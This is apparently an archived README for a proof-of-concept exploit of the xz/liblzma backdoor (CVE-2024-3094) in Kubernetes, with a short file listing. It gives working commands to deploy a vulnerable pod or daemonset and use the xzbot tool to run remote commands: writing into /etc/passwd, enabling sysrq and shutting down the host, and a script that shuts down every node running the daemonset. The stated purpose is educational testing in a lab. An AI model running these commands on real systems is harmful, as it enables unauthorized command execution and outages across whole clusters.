来源

关联漏洞

描述

Basic POC to test CVE-2024-3094

介绍

# CVE-2024-3094
Basic POC to test CVE-2024-3094 vulnerability inside K8s cluster

## :exclamation: DISCLAIMER :exclamation: 
## USE ONLY FOR EDUCATIONAL PURPOSES THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE CAUSED BY THE USE OF THIS SOFTWARE

## Description

We will deploy a vulnerable pod and exploit it to execute commands inside that vulnerable pods, we do inside the same network for security reasons. We don't expossed the vulnerable pod to the internet, but is the same concept.

That vulnerability allows to execute commands inside the pod, even if the pod is running whit security context, you can for ex shutdown the host that is running the pod.

If that vulnerability is running in a single pod, you can shutdown the host, making temporal unavailable all the services running in that host. But, if the vulnerability is running as a deamonset, you can shutdown all the hosts that are running that deamonset, even shutdown the whole cluster.

## Requirements

- K8s cluster deployed
- Kubectl installed
- Access to the K8s cluster
- Go installed


## Usage

First, install xzbots in the cluster

```bash
go install github.com/amlweems/xzbot@latest
```

Download the repo and deploy the vulnerable deployment/daemonset

```bash
git clone https://github.com/shefirot/CVE-2024-3094.git
cd CVE-2024-3094
# Deployment
kubectl apply -f deploy_cve-2024-3094.yml
# Or daemonset
kubectl apply -f daemonset_cve-2024-3094.yml
```

```bashº
# Get the pod name
kubectl -n vulnes get pods

# Port forward the pod
kubectl -n vulnes port-forward <pod-name> 2225:22

# Execute command, for example write in /etc/passwd
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo "David estuvo aqui" >> /etc/passwd'

# Check the /etc/passwd file
kubectl -n vulnes exec <pod-name> -- /usr/bin/cat /etc/passwd
```

Go forward and shutdown the host

```bash
# Enable sysrq
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo 1 > /proc/sys/kernel/sysrq'

# Shutdown the host
$HOME/go/bin/xzbot -addr 127.0.0.1:2225 -cmd 'echo o > /proc/sysrq-trigger'
```

You can also shutdown all the hosts that are running the daemonset

```bash
source shutdown_nodes.sh
```

### Known issues

#### 1. Connection refused

When you execute the loop to shutdown all the hosts, if you receive this error:

```bash
2024/06/11 12:08:58 dial tcp 127.0.0.1:2225: connect: connection refused
```

Give more time to the port forward to be ready, you can increase the sleep time in the loop.

### Extra info

The container image ussed was generated whit the dockerfile in the repo, you can generate the image and push it to your registry.

To generate liblzma.so.5.6.0.patch library, you can use the following the amlweems repo that is in the references.

### References

[amlweems repo](https://github.com/amlweems/xzbot)

[r0binak repo](https://github.com/r0binak/xzk8s)

文件快照

 [4.0K]  /data/pocs/d0f023a4fa814598fdc848861136f5b7b63ce62a
├── [ 549]  daemonset_cve-2024-3094.yml
├── [ 564]  deploy_cve-2024-3094.yml
├── [ 684]  dockerfile
├── [2.8K]  README.md
└── [ 766]  shutdown_nodes.sh

0 directories, 5 files

备注